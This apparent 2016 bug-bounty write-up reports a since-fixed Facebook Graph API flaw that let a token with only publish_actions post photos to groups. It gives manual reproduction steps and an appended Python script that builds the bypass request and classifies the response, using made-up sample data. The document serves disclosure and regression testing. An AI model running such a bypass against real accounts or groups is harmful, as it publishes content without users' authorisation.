Publishing to /group/photos/ without sufficient permissions - Facebook Bug
02 Aug 2016
Update: It was found that this issue had already been reported by Philippe Harewood and fixed by Facebook even before my report. This is just another example of how a later code change must have caused the same, previously fixed vulnerability to reappear (a regression).
Description
According to Facebook's Graph API documentation on publishing to groups other than 'App and Games groups', the publish_actions permission and either user_managed_groups or user_groups are needed.
It was found possible to publish through the photos edge without the user_managed_groups or user_groups scope, with only publish_actions in the access_token.
Impact:
It posts an update to the attacker-targeted group (of course, the victim has to be a member of it) EVEN if the user had granted only the 'ONLY ME' privacy setting for posts when authorizing the access token. Because the post lands in the group rather than on the user's own timeline, the group's members can see it regardless of that setting.
Reproduction:
- Get an access_token for the Graph API Explorer from a test account with only the publish_actions scope set.
- Using the Graph API Explorer, make a POST on behalf of the user to the photos edge of the node {group-id}.
- Set the POST field url to an image URL.
- Complete the request.
It returns an id and a post_id after posting the update, confirming the photo was published to the group without any group scope. Facebook fixed the vulnerability after it was reported to them.
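The following is an added example, not code from the original post or from Facebook: it scripts the reproduction above and the permission check from the Description section. It assumes Graph API version v2.7 (the version current at the time), that the /me/permissions endpoint returns its usual {"data": [{"permission": ..., "status": "granted"|"declined"}]} shape, and it uses constructed sample responses (not captured from Facebook) so that the scope check and the verdict logic run offline. The verdict is "vulnerable" exactly when the photos edge returns an id and post_id for a token that, per the documentation, lacks the required group scope.

```python
"""Check a Graph API access token against the documented group-publish rule
and classify what POST /{group-id}/photos did with it.

Added example; not the original author's tooling. Assumptions are marked."""
import json
import urllib.parse
import urllib.request

GRAPH_BASE = "https://graph.facebook.com/v2.7"  # assumption: API version used in 2016
GROUP_SCOPES = {"user_managed_groups", "user_groups"}


def granted_scopes(permissions_response):
    """Return the granted permission names from a /me/permissions JSON reply."""
    return {
        entry["permission"]
        for entry in permissions_response.get("data", [])
        if entry.get("status") == "granted"
    }


def docs_allow_group_publish(scopes):
    """Documented rule: publish_actions AND (user_managed_groups OR user_groups)."""
    return "publish_actions" in scopes and bool(scopes & GROUP_SCOPES)


def build_photo_publish_request(group_id, image_url, access_token):
    """Build POST /{group-id}/photos with the url field, as in the reproduction."""
    body = urllib.parse.urlencode(
        {"url": image_url, "access_token": access_token}
    ).encode()
    return urllib.request.Request(
        f"{GRAPH_BASE}/{group_id}/photos", data=body, method="POST"
    )


def classify(scopes, photos_response):
    """Compare what the photos edge did with what the docs say the token permits."""
    published = "id" in photos_response and "post_id" in photos_response
    allowed = docs_allow_group_publish(scopes)
    if published and not allowed:
        return "vulnerable"  # publish succeeded without any group scope
    if published:
        return "expected-success"
    if not allowed:
        return "expected-denial"
    return "unexpected-denial"


def send(request):
    """Send a prepared request and decode the JSON reply (network; not used offline)."""
    with urllib.request.urlopen(request) as resp:
        return json.loads(resp.read().decode())


# Constructed sample data (not captured from Facebook): a token that granted
# publish_actions and declined user_managed_groups, and a photos-edge reply of
# the shape the post describes (an id and a post_id). The numbers are made up.
SAMPLE_PERMISSIONS = {
    "data": [
        {"permission": "public_profile", "status": "granted"},
        {"permission": "publish_actions", "status": "granted"},
        {"permission": "user_managed_groups", "status": "declined"},
    ]
}
SAMPLE_PHOTOS_REPLY = {
    "id": "1000000000000001",
    "post_id": "2000000000000001_3000000000000001",
}


def check_sample():
    """Run the verdict logic over the constructed sample."""
    return classify(granted_scopes(SAMPLE_PERMISSIONS), SAMPLE_PHOTOS_REPLY)


if __name__ == "__main__":
    print(check_sample())  # "vulnerable"
```

To run it live, fetch /me/permissions with the test token, feed that JSON to granted_scopes, then pass the reply of send(build_photo_publish_request(...)) to classify; a "vulnerable" verdict means the group-scope check is being bypassed on the photos edge, an "expected-denial" verdict means the fix holds.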
Thanks for reading!